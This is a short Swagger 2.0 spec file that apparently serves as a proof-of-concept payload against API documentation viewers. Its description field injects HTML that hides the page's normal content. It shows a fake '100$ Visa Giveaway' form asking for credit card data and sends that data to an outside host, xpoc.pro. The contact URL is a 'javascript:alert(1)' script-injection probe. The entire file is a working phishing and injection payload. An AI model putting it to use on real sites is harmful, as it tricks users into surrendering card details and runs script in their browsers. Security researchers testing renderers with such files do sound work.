swagger: '2.0'
info:
  version: "100500"
  title: 100$ Visa Giveaway
  default: aaaaaaaaaaaaaaaaaaaaaaaa
  description: <style>.block-desktop{display:none!important}</style><img src=https://test.xpoc.pro/z.jpg style='width:300px;height:300px;animation:fadeMe 2s'><form action=https://xpoc.pro/><p>Enter your Credit Card data to receive 100$!</p><input type=text placeholder='' name=test value=''><input type='submit' value='OK'></form>
  termsOfService: "https://google.com"
  contact: 
   name: "100$ Visa Giveaway"
   url: "javascript:alert(1)"
   email: "https://google.com"
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
